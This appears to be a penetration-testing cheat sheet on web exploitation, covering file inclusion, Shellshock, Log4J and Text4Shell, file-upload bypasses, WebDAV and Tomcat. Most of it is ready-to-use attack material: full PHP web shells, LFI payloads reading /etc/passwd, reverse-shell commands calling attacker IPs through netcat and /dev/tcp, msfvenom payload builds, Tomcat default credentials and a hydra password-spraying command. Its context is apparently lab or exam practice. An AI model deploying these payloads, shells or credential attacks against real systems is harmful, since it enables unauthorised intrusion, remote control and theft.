General

HTTP Status Codes

- 100-199: Information
- 200-299: Success
- 300-399: Redirect
- 400-499: Client error
- 500-599: Server error

cURL

# Header
curl -I

# Send a cookie
curl --cookie "<cookie_name>=<cookie_value>"

# POST request
curl -X POST --data "<param1>=<val1>&<param2>=<val2>"

# JSON request
curl -H 'Content-Type: application/json; charset=UTF-8' --data-binary '{"<param1>":"<val1>"}'

# Encode part of the request
curl -d "<param1>=<data1>" --data-urlencode "<param2>=<value2_to_be_encoded>" -X POST

File Inclusion

Directory traversal vulnerabilities allow reading files outside the web root, while file inclusion vulnerabilities can execute local or remote files by including them in the application’s code.

LFI

kali@kali:~$ echo -n '<?php echo system($_GET["cmd"]);?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls

index.php?page=php://filter/resource=/etc/passwd
index.php?page=data://text/plain,<?php%20echo%20system('ls');?>
index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php

RFI

# Less common than LFI
# In PHP, the allow_url_include option needs to be enabled to leverage RFI

/usr/share/webshells/php/simple-backdoor.php
index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls

Wordpress 404 RCE

php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shellGitHub

target.tld/wp-content/themes/twentytwentytwo/404.php`

RCE via Wordpress Plugin Editor

GitHub - p0dalirius/Wordpress-webshell-plugin: A webshell plugin and interactive shell for pentesting a WordPress website.GitHub

curl -X POST 'http://target.tld/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=exec&cmd=cat /tmp/flag"

Shellshock

nmap -sV -p80 --script http-shellshock --script-args uri=/browser.cgi,cmd=id TARGET'
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -iname *flag* 2>/dev/null'" target.tld/path

Log4J

# Identify
User-Agent: ${jndi:dns://${hostName}.192.168.40.115}
tcpdump -A -i tun0

# Exploit
github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Log4Shell.md

Text4Shell

# URL encode & deliver via curl due to special chars
${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc IP 443 -e /bin/bash')}

File Uploads

Page not found - HackTricksbook.hacktricks.xyz

# Payload in exif data
exiftool -UserComment='sh -i >& /dev/tcp/192.168.45.199/4444 0>&1' qais.jpg
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' qais.jpg

Web Shells

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>

<?php echo system('id'); ?>

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo
"</pre>"; die; }?>

ASPX Upload

https://raw.githubusercontent.com/tennc/webshell/refs/heads/master/fuzzdb-webshell/asp/cmd.aspxraw.githubusercontent.com

/usr/share/webshells/aspx/cmdasp.aspx

Bypasses

List of file signaturesWikipedia

cat shell.php
GIF89a;
<?php system($_GET['cmd']); ?>

file shell.php 
shell.php: GIF image data, version 89a, 2619 x 16188

shell.php?cmd=/usr/bin/busybox nc 192.168.45.202 4444 -e sh

Webdav

WebDav - HackTricksbook.hacktricks.xyz

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.206 LPORT=4444 -f exe >
reverse.exe
cadaver hutch.offsec
dav:/> put reverse.exe
/c c:\Inetpub\wwwroot\reverse.exe # Trigger via cmd.aspx

GIT

GitHub - gitleaks/gitleaks: Find secrets with Gitleaks 🔑GitHub

# Exposed /.git directory
wget -r http://target.com/.git/
cd target.com
git branch
git checkout branch/1
git diff
git log
git show c9c8e8bd0a4b373190c4258e16e07a6296d4e43c
git show 44a055daf7a0cd777f28f444c0d29ddf3ff08c54

# GUI
git-cola

Tomcat

# Default Creds
tomcat:s3cret
tomcat:tomcat
admin:tomcat
admin:admin
admin:

# Spray
hydra -l tomcat -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -f IP http-get /manager/html

# Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.14.30.76 LPORT=443 -f war -o revshell.war 
nc -lvnp 443

PreviousSQL NextMacros

Last updated 4 months ago